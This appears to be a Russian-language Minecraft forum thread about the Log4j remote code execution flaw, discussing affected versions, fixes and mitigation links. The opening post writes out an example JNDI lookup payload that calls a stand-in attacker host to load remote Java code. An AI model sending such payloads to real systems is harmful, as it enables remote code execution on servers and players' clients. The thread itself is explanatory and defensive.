Java уязвимость

• У половины интернета нашли выполнение произвольного кода через Log4j.
  
  Выглядит это так:
  
  1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
  2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
  3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
  
  Гроб. Гроб. Кладбище.
  Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”
  
  Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
• https://github.com/tangxiaofeng7/apache-log4j-poc/issues/5#issuecomment-990573042

 

Не работает для легаси версий.

 

у всех java 8

 

Проверенные источники говорят что все эти флаги бесполезны и реальных фиксов не существует, помимо вписанных в ядро или клиент

 

щас начнется иерархия

 

У кого у всех? 1.16 только джава 16+, а 1.17 - 17+
Вообще не понял, с какими ядрами, версиями майна и джавы это работает?

 

Вроде БЫ как БЫ с ядрами от 1.8 до 1.17 и с жабой 8

 

Везде, где используется логгер Log4j версии до 2.15.0, существует такая проблема. Значит minecraft с 1.8 до 1.18 подвержен проблеме.
Все что 2.15.0 и выше уже не работает так как там отключена по умолчанию такая возможность.
Paper и прочие ядра и приложения просто обновили эту библиотеку до 2.15.0, в чем и собственно фикс.
Кроме этого, эта проблема не только с сервером, но и с клиентом. Сервер может отправить сообщение и заразить клиент таким образом, поэтому ни на какие сервера не безопасно подключаться сейчас.

 

https://www.creeperhost.net/wiki/bo...n/page/mitigating-cve-2021-44228-in-minecraft

 

https://github.com/tox1cozZ/log4j2-jndi-exploit-patcher

fix

 

Да уже все зафтиксили, и бумагу и клиенты сами моджанги.